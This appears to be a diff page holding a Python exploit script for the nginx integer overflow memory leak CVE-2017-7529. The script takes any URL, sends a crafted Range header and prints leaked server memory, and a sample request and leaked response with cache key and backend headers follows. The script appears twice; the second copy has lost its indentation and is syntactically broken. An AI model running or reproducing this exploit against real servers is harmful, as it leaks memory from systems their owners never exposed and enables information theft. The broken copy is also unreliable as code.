pich4ya · May 9, 2018 08:51
diff --git a/nginx_leak.py b/nginx_leak.py
 #!/usr/bin/python
 # -*- coding:utf-8 -*-
 # https://github.com/nixawk/labs/issues/15
 # Nginx - Remote Integer Overflow Vulnerability (Memory Leak)
 # CVE-2017-7529

 import requests
 import logging
 import sys


 logging.basicConfig(level=logging.INFO)
 log = logging.getLogger(__name__)


 def send_http_request(url, headers={}, timeout=8.0):
    httpResponse   = requests.get(url, headers=headers, timeout=timeout,verify=False)
    httpHeaders    = httpResponse.headers

    log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
    return httpResponse


 def exploit(url):
    log.info("target: %s", url)
    httpResponse   = send_http_request(url)

    content_length = httpResponse.headers.get('Content-Length', 0)
    # bytes_length   = int(content_length) + 623
    bytes_length   = int(content_length) + 623
    # content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)
    content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)

    httpResponse   = send_http_request(url, headers={ 'Range': content_length })
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
        log.info("[+] Vulnerable to CVE-2017-7529")
        print(`httpResponse.text`)
    else:
        log.info("[?] Unknown Vulnerable")
    


 if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] %s <url>" % sys.argv[0])
        sys.exit(1)

    url = sys.argv[1]
    exploit(url)


 """
 GET /proxy/demo.png HTTP/1.1
 Accept-Encoding: identity
 Range: bytes=-17208,-9223372036854758792
 Host: 127.0.0.1:8000
 Connection: close
 User-Agent: Python-urllib/2.7

 HTTP/1.1 206 Partial Content
 Server: nginx/1.13.1
 Date: Mon, 14 Aug 2017 05:53:54 GMT
 Content-Type: multipart/byteranges; boundary=00000000000000000002
 Connection: close
 Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
 ETag: "40c9-5547a060fdf00"
 X-Proxy-Cache: HIT


 --00000000000000000002
 Content-Type: image/png
 Content-Range: bytes -623-16584/16585

 .......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
 KEY: httpGET127.0.0.1/proxy/demo.png
 HTTP/1.1 200 OK
 Date: Mon, 14 Aug 2017 05:51:46 GMT
 Server: Apache/2.4.25 (Debian)
 Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
 ETag: "40c9-5547a060fdf00"
 Accept-Ranges: bytes
 Content-Length: 16585
 Connection: close
 Content-Type: image/png

 """
	#!/usr/bin/python
	# -- coding:utf-8 --
	# https://github.com/nixawk/labs/issues/15
	# Nginx - Remote Integer Overflow Vulnerability (Memory Leak)
	# CVE-2017-7529

	import requests
	import logging
	import sys


	logging.basicConfig(level=logging.INFO)
	log = logging.getLogger(__name__)


	def send_http_request(url, headers={}, timeout=8.0):
	httpResponse = requests.get(url, headers=headers, timeout=timeout,verify=False)
	httpHeaders = httpResponse.headers

	log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
	return httpResponse


	def exploit(url):
	log.info("target: %s", url)
	httpResponse = send_http_request(url)

	content_length = httpResponse.headers.get('Content-Length', 0)
	# bytes_length = int(content_length) + 623
	bytes_length = int(content_length) + 623
	# content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)
	content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)

	httpResponse = send_http_request(url, headers={ 'Range': content_length })
	if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
	log.info("[+] Vulnerable to CVE-2017-7529")
	print(`httpResponse.text`)
	else:
	log.info("[?] Unknown Vulnerable")



	if __name__ == '__main__':
	if len(sys.argv) != 2:
	print("[*] %s <url>" % sys.argv[0])
	sys.exit(1)

	url = sys.argv[1]
	exploit(url)


	"""
	GET /proxy/demo.png HTTP/1.1
	Accept-Encoding: identity
	Range: bytes=-17208,-9223372036854758792
	Host: 127.0.0.1:8000
	Connection: close
	User-Agent: Python-urllib/2.7

	HTTP/1.1 206 Partial Content
	Server: nginx/1.13.1
	Date: Mon, 14 Aug 2017 05:53:54 GMT
	Content-Type: multipart/byteranges; boundary=00000000000000000002
	Connection: close
	Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
	ETag: "40c9-5547a060fdf00"
	X-Proxy-Cache: HIT


	--00000000000000000002
	Content-Type: image/png
	Content-Range: bytes -623-16584/16585

	.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
	KEY: httpGET127.0.0.1/proxy/demo.png
	HTTP/1.1 200 OK
	Date: Mon, 14 Aug 2017 05:51:46 GMT
	Server: Apache/2.4.25 (Debian)
	Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
	ETag: "40c9-5547a060fdf00"
	Accept-Ranges: bytes
	Content-Length: 16585
	Connection: close
	Content-Type: image/png

	"""